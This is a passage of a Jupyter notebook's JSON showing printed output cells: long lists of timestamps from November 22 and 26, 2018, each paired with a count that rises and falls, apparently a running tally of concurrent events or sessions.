"['2018-11-26 18:10:00.215393', 6]\n",
"['2018-11-26 18:10:00.959590', 7]\n",
"['2018-11-26 18:10:06.488325', 8]\n",
"['2018-11-26 18:10:09.662131', 9]\n",
"['2018-11-26 18:12:59.065272', 8]\n",
"['2018-11-26 18:14:30.086369', 6]\n",
"['2018-11-26 18:15:00.267873', 4]\n",
"['2018-11-26 18:15:30.318097', 2]\n",
"['2018-11-26 18:16:00.508036', 1]\n",
"['2018-11-26 18:16:14.092464', 2]\n",
"['2018-11-26 18:17:14.175659', 3]\n",
"['2018-11-26 18:20:16.647374', 2]\n",
"['2018-11-26 18:26:05.223754', 1]\n",
"['2018-11-26 18:26:49.242475', 2]\n",
"['2018-11-26 18:33:34.998059', 1]\n",
"['2018-11-26 18:54:05.874057', 2]\n",
"['2018-11-26 18:54:11.859313', 3]\n",
"['2018-11-26 18:54:21.577699', 4]\n",
"['2018-11-26 18:55:30.643638', 5]\n",
"['2018-11-26 18:55:39.192621', 6]\n",
"['2018-11-26 18:56:00.062118', 5]\n",
"['2018-11-26 18:56:20.475766', 6]\n",
"['2018-11-26 18:56:22.599995', 7]\n",
"['2018-11-26 18:56:31.718128', 8]\n",
"['2018-11-26 18:56:35.713651', 9]\n",
"['2018-11-26 18:56:57.308283', 10]\n",
"['2018-11-26 18:58:24.892806', 9]\n",
"['2018-11-26 18:59:25.616790', 10]\n",
"['2018-11-26 19:00:20.034095', 8]\n",
"['2018-11-26 19:00:32.999081', 6]\n",
"['2018-11-26 19:01:34.249792', 4]\n",
"['2018-11-26 19:03:04.517173', 5]\n",
"['2018-11-26 19:03:29.259812', 4]\n",
"['2018-11-26 19:04:03.281354', 5]\n",
"['2018-11-26 19:06:38.346350', 6]\n",
"['2018-11-26 19:07:16.169284', 5]\n",
"['2018-11-26 19:08:37.736541', 4]\n",
"['2018-11-26 19:08:54.176230', 3]\n",
"['2018-11-26 19:09:34.402394', 4]\n",
"['2018-11-26 19:14:01.886456', 3]\n",
"['2018-11-26 19:14:07.998163', 4]\n",
"['2018-11-26 19:14:28.538077', 5]\n",
"['2018-11-26 19:17:31.327316', 6]\n",
"['2018-11-26 19:17:41.774637', 7]\n",
"['2018-11-26 19:18:20.966497', 6]\n",
"['2018-11-26 19:21:10.229772', 5]\n",
"['2018-11-26 19:21:40.991474', 4]\n",
"['2018-11-26 19:22:12.083850', 3]\n",
"['2018-11-26 19:24:26.791208', 4]\n",
"['2018-11-26 19:36:46.481954', 1]\n",
"['2018-11-26 19:37:25.130915', 2]\n",
"['2018-11-26 19:41:23.451054', 3]\n",
"['2018-11-26 19:41:25.290839', 2]\n",
"['2018-11-26 19:46:38.200424', 3]\n",
"['2018-11-26 19:46:49.880188', 4]\n",
"['2018-11-26 19:51:09.901304', 3]\n",
"['2018-11-26 19:51:21.792572', 4]\n",
"['2018-11-26 19:51:24.975841', 5]\n",
"['2018-11-26 19:52:33.592335', 3]\n",
"['2018-11-26 19:52:38.625433', 4]\n",
"['2018-11-26 19:53:53.860642', 5]\n",
"['2018-11-26 19:56:13.377007', 4]\n",
"['2018-11-26 19:58:40.101500', 3]\n",
"['2018-11-26 20:01:25.133868', 4]\n",
"['2018-11-26 20:04:07.865345', 5]\n",
"['2018-11-26 20:04:46.973280', 6]\n",
"['2018-11-26 20:04:58.241546', 7]\n",
"['2018-11-26 20:05:50.314991', 8]\n",
"['2018-11-26 20:07:24.913099', 9]\n",
"['2018-11-26 20:08:19.391311', 7]\n",
"['2018-11-26 20:08:54.694858', 6]\n",
"['2018-11-26 20:09:23.299211', 7]\n",
"['2018-11-26 20:09:26.504385', 6]\n",
"['2018-11-26 20:16:15.875729', 5]\n",
"['2018-11-26 20:16:48.749983', 4]\n",
"['2018-11-26 20:20:43.880375', 3]\n",
"['2018-11-26 20:22:45.228484', 2]\n",
"['2018-11-26 20:24:56.133052', 3]\n",
"['2018-11-26 20:27:11.207083', 4]\n",
"['2018-11-26 20:28:34.190531', 5]\n",
"['2018-11-26 20:28:34.193930', 6]\n",
"['2018-11-26 20:30:01.508970', 5]\n",
"['2018-11-26 20:30:22.959211', 4]\n",
"['2018-11-26 20:30:56.214479', 5]\n",
"['2018-11-26 20:31:05.226929', 4]\n",
"['2018-11-26 20:33:59.318390', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 20:34:32.498158', 2]\n",
"['2018-11-26 20:41:40.621048', 1]\n",
"['2018-11-26 20:47:30.809413', 2]\n",
"['2018-11-26 20:47:35.138889', 3]\n",
"['2018-11-26 20:48:01.919936', 4]\n",
"['2018-11-26 20:49:30.244451', 5]\n",
"['2018-11-26 20:55:39.457039', 1]\n",
"['2018-11-22 05:36:22.948006', 2]\n",
"['2018-11-22 05:36:24.606504', 3]\n",
"['2018-11-22 05:36:24.896547', 4]\n",
"['2018-11-22 05:36:26.042057', 5]\n",
"['2018-11-22 05:36:34.765252', 6]\n",
"['2018-11-22 05:48:06.157088', 2]\n",
"['2018-11-22 05:52:28.364529', 3]\n",
"['2018-11-22 05:54:30.020330', 2]\n",
"['2018-11-22 05:57:17.310538', 3]\n",
"['2018-11-22 05:57:20.195659', 4]\n",
"['2018-11-22 05:59:01.015544', 5]\n",
"['2018-11-22 06:01:20.153108', 4]\n",
"['2018-11-22 06:01:56.228755', 5]\n",
"['2018-11-22 06:02:00.614523', 6]\n",
"['2018-11-22 06:03:01.919837', 5]\n",
"['2018-11-22 06:03:09.130654', 6]\n",
"['2018-11-22 06:04:00.648205', 7]\n",
"['2018-11-22 06:05:31.341073', 8]\n",
"['2018-11-22 06:06:33.538659', 7]\n",
"['2018-11-22 06:08:03.395835', 6]\n",
"['2018-11-22 06:08:09.208339', 7]\n",
"['2018-11-22 06:08:48.255792', 6]\n",
"['2018-11-22 06:08:53.884531', 7]\n",
"['2018-11-22 06:11:18.210570', 8]\n",
"['2018-11-22 06:12:22.982068', 7]\n",
"['2018-11-22 06:13:02.794211', 6]\n",
"['2018-11-22 06:14:20.188301', 7]\n",
"['2018-11-22 06:14:36.014728', 8]\n",
"['2018-11-22 06:15:13.943570', 9]\n",
"['2018-11-22 06:15:18.491987', 8]\n",
"['2018-11-22 06:16:38.108064', 9]\n",
"['2018-11-22 06:17:49.407704', 10]\n",
"['2018-11-22 06:19:04.602977', 9]\n",
"['2018-11-22 06:19:24.359092', 8]\n",
"['2018-11-22 06:22:33.516648', 7]\n",
"['2018-11-22 06:23:14.674829', 8]\n",
"['2018-11-22 06:26:13.921884', 9]\n",
"['2018-11-22 06:27:36.757952', 8]\n",
"['2018-11-22 06:30:26.736611', 7]\n",
"['2018-11-22 06:31:00.335886', 6]\n",
"['2018-11-22 06:31:18.120100', 5]\n",
"['2018-11-22 06:47:33.949450', 2]\n",
"['2018-11-22 06:49:59.010088', 3]\n",
"['2018-11-22 06:51:39.710858', 4]\n",
"['2018-11-22 06:51:43.845620', 5]\n",
"['2018-11-22 06:54:15.279763', 4]\n",
"['2018-11-22 06:58:57.351202', 2]\n",
"['2018-11-22 06:59:37.960293', 3]\n",
"['2018-11-22 07:04:03.128448', 2]\n",
"['2018-11-22 07:04:51.770528', 3]\n",
"['2018-11-22 07:04:57.224422', 4]\n",
"['2018-11-22 07:05:02.406502', 5]\n",
"['2018-11-22 07:07:13.848749', 6]\n",
"['2018-11-22 07:07:45.360927', 7]\n",
"['2018-11-22 07:08:09.362668', 6]\n",
"['2018-11-22 07:09:09.116956', 7]\n",
"['2018-11-22 07:09:36.074241', 8]\n",
"['2018-11-22 07:11:25.056447', 7]\n",
"['2018-11-22 07:11:47.601569', 8]\n",
"['2018-11-22 07:13:29.135235', 7]\n",
"['2018-11-22 07:14:23.682347', 8]\n",
"['2018-11-22 07:15:00.687651', 7]\n",
"['2018-11-22 07:15:29.566889', 8]\n",
"['2018-11-22 07:15:36.150793', 9]\n",
"['2018-11-22 07:15:49.653352', 8]\n",
"['2018-11-22 07:16:51.978786', 9]\n",
"['2018-11-22 07:16:59.058449', 8]\n",
"['2018-11-22 07:17:30.318946', 7]\n",
"['2018-11-22 07:17:52.500664', 8]\n",
"['2018-11-22 07:19:36.415105', 7]\n",
"['2018-11-22 07:19:53.655418', 6]\n",
"['2018-11-22 07:20:14.930740', 5]\n",
"['2018-11-22 07:20:36.289670', 6]\n",
"['2018-11-22 07:22:28.465913', 7]\n",
"['2018-11-22 07:22:41.472842', 8]\n",
"['2018-11-22 07:22:48.001065', 9]\n",
"['2018-11-22 07:22:50.310019', 10]\n",
"['2018-11-22 07:22:51.492472', 11]\n",
"['2018-11-22 07:23:39.992625', 10]\n",
"['2018-11-22 07:24:32.541292', 11]\n",
"['2018-11-22 07:24:57.960234', 10]\n",
"['2018-11-22 07:25:01.878533', 11]\n",
"['2018-11-22 07:26:35.473517', 10]\n",
"['2018-11-22 07:27:08.025622', 7]\n",
"['2018-11-22 07:28:54.254474', 6]\n",
"['2018-11-22 07:29:33.385135', 5]\n",
"['2018-11-22 07:31:32.725074', 4]\n",
"['2018-11-22 07:34:08.579663', 3]\n",
"['2018-11-22 07:35:07.195398', 4]\n",
"['2018-11-22 07:37:11.825844', 3]\n",
"['2018-11-22 07:38:04.226311', 4]\n",
"['2018-11-22 07:43:26.005319', 2]\n",
"['2018-11-22 07:46:19.776044', 3]\n",
"['2018-11-22 07:51:38.241250', 2]\n",
"['2018-11-22 07:54:02.041374', 3]\n",
"['2018-11-22 07:55:28.253209', 4]\n",
"['2018-11-22 07:57:45.318927', 5]\n",
"['2018-11-22 07:58:25.689337', 6]\n",
"['2018-11-22 07:58:39.873207', 7]\n",
"['2018-11-22 07:58:57.419278', 8]\n",
"['2018-11-22 07:59:28.333418', 7]\n",
"['2018-11-22 07:59:33.631922', 8]\n",
"['2018-11-22 07:59:56.705863', 9]\n",
"['2018-11-22 08:00:25.503721', 10]\n",
"['2018-11-22 08:00:37.402659', 11]\n",
"['2018-11-22 08:00:52.374210', 10]\n",
"['2018-11-22 08:01:12.823579', 11]\n",
"['2018-11-22 08:01:29.890628', 12]\n",
"['2018-11-22 08:01:38.731648', 13]\n",
"['2018-11-22 08:04:21.534176', 12]\n",
"['2018-11-22 08:05:46.401172', 13]\n",
"['2018-11-22 08:06:06.700793', 12]\n",
"['2018-11-22 08:07:06.720930', 11]\n",
"['2018-11-22 08:07:10.717080', 12]\n",
"['2018-11-22 08:07:25.215816', 13]\n",
"['2018-11-22 08:07:52.742588', 14]\n",
"['2018-11-22 08:08:02.889077', 13]\n",
"['2018-11-22 08:08:23.169771', 14]\n",
"['2018-11-22 08:08:28.546416', 15]\n",
"['2018-11-22 08:09:02.220303', 16]\n",
"['2018-11-22 08:09:20.085487', 15]\n",
"['2018-11-22 08:09:47.871562', 14]\n",
"['2018-11-22 08:12:10.649490', 15]\n",
"['2018-11-22 08:12:18.415647', 16]\n",
"['2018-11-22 08:12:24.190079', 15]\n",
"['2018-11-22 08:12:59.152077', 16]\n",
"['2018-11-22 08:13:04.782801', 15]\n",
"['2018-11-22 08:13:15.664286', 16]\n",
"['2018-11-22 08:13:25.618877', 15]\n",
"['2018-11-22 08:13:28.025036', 16]\n",
"['2018-11-22 08:13:39.472095', 17]\n",
"['2018-11-22 08:13:45.212441', 18]\n",
"['2018-11-22 08:13:47.018444', 19]\n",
"['2018-11-22 08:13:47.615678', 20]\n",
"['2018-11-22 08:13:58.144571', 21]\n",
"['2018-11-22 08:16:22.183356', 20]\n",
"['2018-11-22 08:16:27.649819', 19]\n",
"['2018-11-22 08:16:30.993300', 20]\n",
"['2018-11-22 08:16:56.182282', 21]\n",
"['2018-11-22 08:17:51.672429', 19]\n",
"['2018-11-22 08:18:01.044288', 18]\n",
"['2018-11-22 08:18:08.114304', 19]\n",
"['2018-11-22 08:18:19.064484', 17]\n",
"['2018-11-22 08:18:23.148826', 16]\n",
"['2018-11-22 08:18:24.440749', 17]\n",
"['2018-11-22 08:18:38.993868', 18]\n",
"['2018-11-22 08:19:03.005989', 19]\n",
"['2018-11-22 08:19:21.638160', 18]\n",
"['2018-11-22 08:19:29.847270', 17]\n",
"['2018-11-22 08:19:30.760954', 18]\n",
"['2018-11-22 08:19:38.798179', 17]\n",
"['2018-11-22 08:19:53.570782', 18]\n",
"['2018-11-22 08:20:16.412355', 19]\n",
"['2018-11-22 08:20:31.907697', 18]\n",
"['2018-11-22 08:20:56.359296', 17]\n",
"['2018-11-22 08:21:09.573560', 16]\n",
"['2018-11-22 08:21:10.571850', 17]\n",
"['2018-11-22 08:21:18.971194', 18]\n",
"['2018-11-22 08:21:27.797604', 19]\n",
"['2018-11-22 08:21:33.268092', 18]\n",
"['2018-11-22 08:21:49.407778', 19]\n",
"['2018-11-22 08:22:34.995067', 17]\n",
"['2018-11-22 08:23:00.378369', 16]\n",
"['2018-11-22 08:23:13.025707', 15]\n",
"['2018-11-22 08:23:16.016078', 16]\n",
"['2018-11-22 08:24:58.261099', 17]\n",
"['2018-11-22 08:25:06.809851', 18]\n",
"['2018-11-22 08:25:17.695544', 16]\n",
"['2018-11-22 08:25:24.971470', 15]\n",
"['2018-11-22 08:25:39.821412', 14]\n",
"['2018-11-22 08:26:18.989392', 12]\n",
"['2018-11-22 08:26:28.789299', 13]\n",
"['2018-11-22 08:26:38.311609', 12]\n",
"['2018-11-22 08:26:46.307482', 13]\n",
"['2018-11-22 08:26:49.068349', 14]\n",
"['2018-11-22 08:27:13.186842', 13]\n",
"['2018-11-22 08:27:17.619462', 14]\n",
"['2018-11-22 08:28:06.812041', 13]\n",
"['2018-11-22 08:28:28.673783', 12]\n",
"['2018-11-22 08:29:06.404751', 11]\n",
"['2018-11-22 08:29:14.730298', 12]\n",
"['2018-11-22 08:29:41.775064', 11]\n",
"['2018-11-22 08:29:53.851605', 12]\n",
"['2018-11-22 08:31:34.938285', 11]\n",
"['2018-11-22 08:31:39.391920', 10]\n",
"['2018-11-22 08:32:23.079510', 9]\n",
"['2018-11-22 08:32:37.684792', 8]\n",
"['2018-11-22 08:33:21.333548', 7]\n",
"['2018-11-22 08:34:20.902954', 6]\n",
"['2018-11-22 08:36:23.146569', 5]\n",
"['2018-11-22 08:38:25.568897', 6]\n",
"['2018-11-22 08:39:54.943093', 7]\n",
"['2018-11-22 08:42:35.373055', 6]\n",
"['2018-11-22 08:44:24.432369', 5]\n",
"['2018-11-22 08:48:19.980429', 6]\n",
"['2018-11-22 08:49:31.713534', 5]\n",
"['2018-11-22 08:50:12.375880', 6]\n",
"['2018-11-22 08:52:23.804801', 5]\n",
"['2018-11-22 08:54:45.078736', 4]\n",
"['2018-11-22 08:54:50.362228', 3]\n",
"['2018-11-22 09:00:51.176292', 2]\n",
"['2018-11-22 09:02:17.324424', 3]\n",
"['2018-11-22 09:05:49.002795', 4]\n",
"['2018-11-22 09:09:19.434083', 3]\n",
"['2018-11-22 09:15:35.310834', 4]\n",
"['2018-11-22 09:16:52.342060', 3]\n",
"['2018-11-22 09:20:07.824350', 4]\n",
"['2018-11-22 09:20:22.928519', 5]\n",
"['2018-11-22 09:22:01.808474', 6]\n",
"['2018-11-22 09:24:18.157976', 5]\n",
"['2018-11-22 09:28:59.596630', 4]\n",
"['2018-11-22 09:30:35.538022', 5]\n",
"['2018-11-22 09:30:36.843544', 6]\n",
"['2018-11-22 09:30:45.535744', 7]\n",
"['2018-11-22 09:30:52.026213', 8]\n",
"['2018-11-22 09:31:28.695001', 9]\n",
"['2018-11-22 09:31:54.453357', 8]\n",
"['2018-11-22 09:32:50.684863', 9]\n",
"['2018-11-22 09:34:10.172919', 10]\n",
"['2018-11-22 09:34:13.378341', 11]\n",
"['2018-11-22 09:34:18.980826', 12]\n",
"['2018-11-22 09:34:27.675210', 13]\n",
"['2018-11-22 09:34:37.941474', 12]\n",
"['2018-11-22 09:34:39.941125', 10]\n",
"['2018-11-22 09:34:52.467380', 11]\n",
"['2018-11-22 09:34:58.447331', 12]\n",
"['2018-11-22 09:35:00.257497', 13]\n",
"['2018-11-22 09:35:01.062971', 14]\n",
"['2018-11-22 09:35:06.665959', 15]\n",
"['2018-11-22 09:36:52.707953', 14]\n",
"['2018-11-22 09:38:10.736902', 13]\n",
"['2018-11-22 09:39:07.579838', 12]\n",
"['2018-11-22 09:39:54.283197', 11]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 09:40:03.864650', 9]\n",
"['2018-11-22 09:40:21.306576', 7]\n",
"['2018-11-22 09:40:29.560863', 8]\n",
"['2018-11-22 09:40:35.722308', 9]\n",
"['2018-11-22 09:40:39.114360', 8]\n",
"['2018-11-22 09:40:54.112970', 7]\n",
"['2018-11-22 09:41:37.396429', 8]\n",
"['2018-11-22 09:41:52.818965', 9]\n",
"['2018-11-22 09:42:59.541612', 8]\n",
"['2018-11-22 09:44:52.294839', 7]\n",
"['2018-11-22 09:45:09.733535', 5]\n",
"['2018-11-22 09:45:46.004824', 4]\n",
"['2018-11-22 09:47:27.973044', 3]\n",
"['2018-11-22 09:53:16.893209', 2]\n",
"['2018-11-22 10:01:51.185914', 3]\n",
"['2018-11-22 10:05:20.458090', 4]\n",
"['2018-11-22 10:06:38.095409', 5]\n",
"['2018-11-22 10:08:47.501227', 6]\n",
"['2018-11-22 10:09:23.521820', 5]\n",
"['2018-11-22 10:10:10.057720', 6]\n",
"['2018-11-22 10:10:21.303743', 7]\n",
"['2018-11-22 10:11:09.617147', 8]\n",
"['2018-11-22 10:11:09.878132', 9]\n",
"['2018-11-22 10:11:12.612951', 10]\n",
"['2018-11-22 10:11:19.109172', 11]\n",
"['2018-11-22 10:11:19.527545', 12]\n",
"['2018-11-22 10:11:39.626172', 13]\n",
"['2018-11-22 10:11:47.713316', 14]\n",
"['2018-11-22 10:11:59.734987', 15]\n",
"['2018-11-22 10:12:39.782212', 16]\n",
"['2018-11-22 10:13:00.221903', 17]\n",
"['2018-11-22 10:13:06.326507', 18]\n",
"['2018-11-22 10:14:19.314312', 17]\n",
"['2018-11-22 10:14:23.549821', 16]\n",
"['2018-11-22 10:14:37.315700', 17]\n",
"['2018-11-22 10:15:17.347018', 16]\n",
"['2018-11-22 10:15:22.306286', 17]\n",
"['2018-11-22 10:15:36.789245', 16]\n",
"['2018-11-22 10:16:00.210966', 14]\n",
"['2018-11-22 10:17:19.641683', 13]\n",
"['2018-11-22 10:18:01.093390', 14]\n",
"['2018-11-22 10:18:51.469683', 13]\n",
"['2018-11-22 10:18:55.379549', 12]\n",
"['2018-11-22 10:19:04.034273', 13]\n",
"['2018-11-22 10:19:06.476317', 12]\n",
"['2018-11-22 10:19:06.863104', 13]\n",
"['2018-11-22 10:19:20.705036', 12]\n",
"['2018-11-22 10:19:23.558719', 11]\n",
"['2018-11-22 10:19:44.711071', 10]\n",
"['2018-11-22 10:19:45.941089', 11]\n",
"['2018-11-22 10:20:00.977963', 10]\n",
"['2018-11-22 10:20:15.977130', 9]\n",
"['2018-11-22 10:20:38.253803', 10]\n",
"['2018-11-22 10:21:10.169760', 11]\n",
"['2018-11-22 10:21:11.432946', 12]\n",
"['2018-11-22 10:22:59.177804', 11]\n",
"['2018-11-22 10:23:01.423141', 12]\n",
"['2018-11-22 10:23:05.398146', 11]\n",
"['2018-11-22 10:23:26.698511', 12]\n",
"['2018-11-22 10:23:40.802806', 11]\n",
"['2018-11-22 10:23:55.404974', 12]\n",
"['2018-11-22 10:24:42.580612', 13]\n",
"['2018-11-22 10:24:51.687895', 14]\n",
"['2018-11-22 10:24:59.107745', 15]\n",
"['2018-11-22 10:25:11.290558', 14]\n",
"['2018-11-22 10:26:18.944246', 13]\n",
"['2018-11-22 10:26:48.995013', 12]\n",
"['2018-11-22 10:27:30.085839', 11]\n",
"['2018-11-22 10:27:56.231678', 10]\n",
"['2018-11-22 10:28:21.309090', 11]\n",
"['2018-11-22 10:28:28.357370', 12]\n",
"['2018-11-22 10:28:43.874715', 13]\n",
"['2018-11-22 10:28:46.608394', 14]\n",
"['2018-11-22 10:29:26.308408', 15]\n",
"['2018-11-22 10:29:54.941423', 16]\n",
"['2018-11-22 10:29:58.961958', 15]\n",
"['2018-11-22 10:30:31.403405', 16]\n",
"['2018-11-22 10:31:35.076309', 15]\n",
"['2018-11-22 10:32:20.433366', 14]\n",
"['2018-11-22 10:32:59.476197', 13]\n",
"['2018-11-22 10:33:16.649642', 14]\n",
"['2018-11-22 10:33:27.719269', 13]\n",
"['2018-11-22 10:33:29.711667', 12]\n",
"['2018-11-22 10:34:43.436570', 11]\n",
"['2018-11-22 10:35:39.885732', 10]\n",
"['2018-11-22 10:37:19.193654', 9]\n",
"['2018-11-22 10:37:24.868555', 8]\n",
"['2018-11-22 10:38:29.064690', 7]\n",
"['2018-11-22 10:38:49.250643', 8]\n",
"['2018-11-22 10:39:04.718905', 7]\n",
"['2018-11-22 10:39:24.627713', 8]\n",
"['2018-11-22 10:40:21.822124', 7]\n",
"['2018-11-22 10:40:35.056015', 8]\n",
"['2018-11-22 10:40:37.364328', 9]\n",
"['2018-11-22 10:40:59.376572', 10]\n",
"['2018-11-22 10:45:14.490811', 8]\n",
"['2018-11-22 10:45:24.707648', 7]\n",
"['2018-11-22 10:48:10.922849', 8]\n",
"['2018-11-22 10:48:53.965784', 9]\n",
"['2018-11-22 10:48:56.628398', 10]\n",
"['2018-11-22 10:49:29.202094', 9]\n",
"['2018-11-22 10:49:50.376350', 10]\n",
"['2018-11-22 10:51:21.200522', 11]\n",
"['2018-11-22 10:51:32.464311', 12]\n",
"['2018-11-22 10:52:47.288603', 10]\n",
"['2018-11-22 10:55:24.953235', 5]\n",
"['2018-11-22 10:55:31.741935', 4]\n",
"['2018-11-22 10:55:32.991477', 3]\n",
"['2018-11-22 10:59:48.929688', 4]\n",
"['2018-11-22 10:59:58.784982', 5]\n",
"['2018-11-22 11:00:01.927428', 6]\n",
"['2018-11-22 11:00:07.250843', 7]\n",
"['2018-11-22 11:00:12.126081', 8]\n",
"['2018-11-22 11:00:31.087568', 7]\n",
"['2018-11-22 11:01:11.747216', 8]\n",
"['2018-11-22 11:01:26.702138', 7]\n",
"['2018-11-22 11:01:55.041278', 8]\n",
"['2018-11-22 11:04:05.152703', 7]\n",
"['2018-11-22 11:04:08.050118', 6]\n",
"['2018-11-22 11:04:19.274808', 7]\n",
"['2018-11-22 11:04:45.192911', 6]\n",
"['2018-11-22 11:08:23.055507', 5]\n",
"['2018-11-22 11:11:26.784241', 6]\n",
"['2018-11-22 11:12:46.319651', 5]\n",
"['2018-11-22 11:13:42.605908', 6]\n",
"['2018-11-22 11:13:43.998090', 7]\n",
"['2018-11-22 11:15:59.496820', 8]\n",
"['2018-11-22 11:17:52.955921', 7]\n",
"['2018-11-22 11:17:58.775143', 8]\n",
"['2018-11-22 11:18:17.704604', 9]\n",
"['2018-11-22 11:19:24.716839', 10]\n",
"['2018-11-22 11:19:54.186200', 9]\n",
"['2018-11-22 11:19:59.435775', 8]\n",
"['2018-11-22 11:20:02.365596', 7]\n",
"['2018-11-22 11:20:10.696884', 8]\n",
"['2018-11-22 11:20:59.502697', 9]\n",
"['2018-11-22 11:22:43.486580', 10]\n",
"['2018-11-22 11:24:27.925105', 9]\n",
"['2018-11-22 11:24:46.892380', 10]\n",
"['2018-11-22 11:25:40.238471', 11]\n",
"['2018-11-22 11:26:33.807955', 10]\n",
"['2018-11-22 11:26:39.417281', 11]\n",
"['2018-11-22 11:26:45.266276', 10]\n",
"['2018-11-22 11:28:11.808053', 11]\n",
"['2018-11-22 11:28:15.259540', 12]\n",
"['2018-11-22 11:28:19.334563', 13]\n",
"['2018-11-22 11:28:44.224135', 14]\n",
"['2018-11-22 11:28:56.919682', 13]\n",
"['2018-11-22 11:29:11.833069', 12]\n",
"['2018-11-22 11:29:41.870146', 11]\n",
"['2018-11-22 11:30:14.211112', 12]\n",
"['2018-11-22 11:31:01.454948', 11]\n",
"['2018-11-22 11:31:10.603008', 12]\n",
"['2018-11-22 11:31:20.757392', 13]\n",
"['2018-11-22 11:31:25.420672', 14]\n",
"['2018-11-22 11:31:54.483204', 13]\n",
"['2018-11-22 11:32:41.606153', 12]\n",
"['2018-11-22 11:33:17.277755', 13]\n",
"['2018-11-22 11:33:42.021579', 12]\n",
"['2018-11-22 11:33:45.361906', 13]\n",
"['2018-11-22 11:33:52.496310', 14]\n",
"['2018-11-22 11:34:10.131282', 15]\n",
"['2018-11-22 11:34:26.162747', 14]\n",
"['2018-11-22 11:34:51.484945', 15]\n",
"['2018-11-22 11:35:45.274638', 14]\n",
"['2018-11-22 11:35:57.977402', 15]\n",
"['2018-11-22 11:36:39.050378', 14]\n",
"['2018-11-22 11:36:50.384329', 13]\n",
"['2018-11-22 11:37:41.407316', 12]\n",
"['2018-11-22 11:37:46.054982', 11]\n",
"['2018-11-22 11:37:59.098593', 10]\n",
"['2018-11-22 11:38:08.763770', 9]\n",
"['2018-11-22 11:38:09.806302', 10]\n",
"['2018-11-22 11:38:29.003316', 11]\n",
"['2018-11-22 11:38:54.810114', 10]\n",
"['2018-11-22 11:40:30.166129', 9]\n",
"['2018-11-22 11:40:47.676132', 10]\n",
"['2018-11-22 11:40:49.195080', 11]\n",
"['2018-11-22 11:42:54.239934', 10]\n",
"['2018-11-22 11:43:04.896945', 8]\n",
"['2018-11-22 11:43:18.041207', 7]\n",
"['2018-11-22 11:43:41.416088', 6]\n",
"['2018-11-22 11:44:37.664187', 5]\n",
"['2018-11-22 11:45:52.294827', 3]\n",
"['2018-11-22 12:02:55.841083', 2]\n",
"['2018-11-22 12:03:48.889970', 3]\n",
"['2018-11-22 12:03:52.230564', 4]\n",
"['2018-11-22 12:03:55.126315', 5]\n",
"['2018-11-22 12:07:55.380366', 4]\n",
"['2018-11-22 12:13:05.820285', 5]\n",
"['2018-11-22 12:13:45.276173', 6]\n",
"['2018-11-22 12:13:47.773980', 7]\n",
"['2018-11-22 12:13:48.394441', 8]\n",
"['2018-11-22 12:13:50.720776', 9]\n",
"['2018-11-22 12:14:01.291714', 10]\n",
"['2018-11-22 12:14:09.690983', 11]\n",
"['2018-11-22 12:14:55.026292', 12]\n",
"['2018-11-22 12:15:05.185178', 13]\n",
"['2018-11-22 12:15:19.533114', 14]\n",
"['2018-11-22 12:15:51.234410', 15]\n",
"['2018-11-22 12:16:31.462309', 16]\n",
"['2018-11-22 12:16:54.013070', 17]\n",
"['2018-11-22 12:17:11.276388', 16]\n",
"['2018-11-22 12:17:30.243443', 15]\n",
"['2018-11-22 12:17:49.860438', 14]\n",
"['2018-11-22 12:19:16.784068', 15]\n",
"['2018-11-22 12:19:16.953822', 16]\n",
"['2018-11-22 12:19:19.666192', 15]\n",
"['2018-11-22 12:19:22.198398', 14]\n",
"['2018-11-22 12:19:24.733958', 15]\n",
"['2018-11-22 12:19:29.338791', 16]\n",
"['2018-11-22 12:19:30.421829', 17]\n",
"['2018-11-22 12:19:45.388164', 16]\n",
"['2018-11-22 12:19:58.754111', 15]\n",
"['2018-11-22 12:20:29.779752', 14]\n",
"['2018-11-22 12:20:40.418690', 13]\n",
"['2018-11-22 12:20:52.428080', 12]\n",
"['2018-11-22 12:21:22.600102', 11]\n",
"['2018-11-22 12:21:28.286750', 12]\n",
"['2018-11-22 12:21:33.617560', 13]\n",
"['2018-11-22 12:21:53.243978', 14]\n",
"['2018-11-22 12:21:56.790676', 15]\n",
"['2018-11-22 12:22:31.880580', 14]\n",
"['2018-11-22 12:23:12.626491', 13]\n",
"['2018-11-22 12:23:13.772140', 14]\n",
"['2018-11-22 12:23:29.675188', 13]\n",
"['2018-11-22 12:24:06.663177', 11]\n",
"['2018-11-22 12:24:25.586768', 9]\n",
"['2018-11-22 12:25:01.421586', 10]\n",
"['2018-11-22 12:25:27.881500', 11]\n",
"['2018-11-22 12:26:15.039841', 12]\n",
"['2018-11-22 12:26:24.985389', 13]\n",
"['2018-11-22 12:26:30.558684', 14]\n",
"['2018-11-22 12:26:45.370224', 13]\n",
"['2018-11-22 12:27:06.134838', 10]\n",
"['2018-11-22 12:27:40.198341', 9]\n",
"['2018-11-22 12:28:29.161282', 10]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 12:29:01.650901', 9]\n",
"['2018-11-22 12:29:30.539214', 10]\n",
"['2018-11-22 12:29:56.780413', 11]\n",
"['2018-11-22 12:30:26.809917', 10]\n",
"['2018-11-22 12:30:39.144029', 9]\n",
"['2018-11-22 12:30:56.830152', 8]\n",
"['2018-11-22 12:31:13.671920', 9]\n",
"['2018-11-22 12:31:29.672319', 10]\n",
"['2018-11-22 12:33:53.101719', 6]\n",
"['2018-11-22 12:34:35.064803', 5]\n",
"['2018-11-22 12:35:20.826725', 3]\n",
"['2018-11-22 12:38:20.608032', 4]\n",
"['2018-11-22 12:39:35.678322', 3]\n",
"['2018-11-22 12:50:39.001100', 4]\n",
"['2018-11-22 12:53:10.440780', 5]\n",
"['2018-11-22 12:54:40.433163', 4]\n",
"['2018-11-22 12:55:24.444039', 3]\n",
"['2018-11-22 12:57:31.840552', 4]\n",
"['2018-11-22 12:59:09.717229', 5]\n",
"['2018-11-22 12:59:28.287572', 6]\n",
"['2018-11-22 12:59:39.042380', 7]\n",
"['2018-11-22 13:00:22.669114', 8]\n",
"['2018-11-22 13:00:39.697342', 9]\n",
"['2018-11-22 13:01:38.632356', 10]\n",
"['2018-11-22 13:02:33.860006', 9]\n",
"['2018-11-22 13:02:40.816694', 8]\n",
"['2018-11-22 13:03:20.672346', 7]\n",
"['2018-11-22 13:04:54.445560', 6]\n",
"['2018-11-22 13:06:25.628804', 7]\n",
"['2018-11-22 13:07:07.080850', 8]\n",
"['2018-11-22 13:07:16.346897', 7]\n",
"['2018-11-22 13:08:20.695761', 8]\n",
"['2018-11-22 13:09:37.564820', 9]\n",
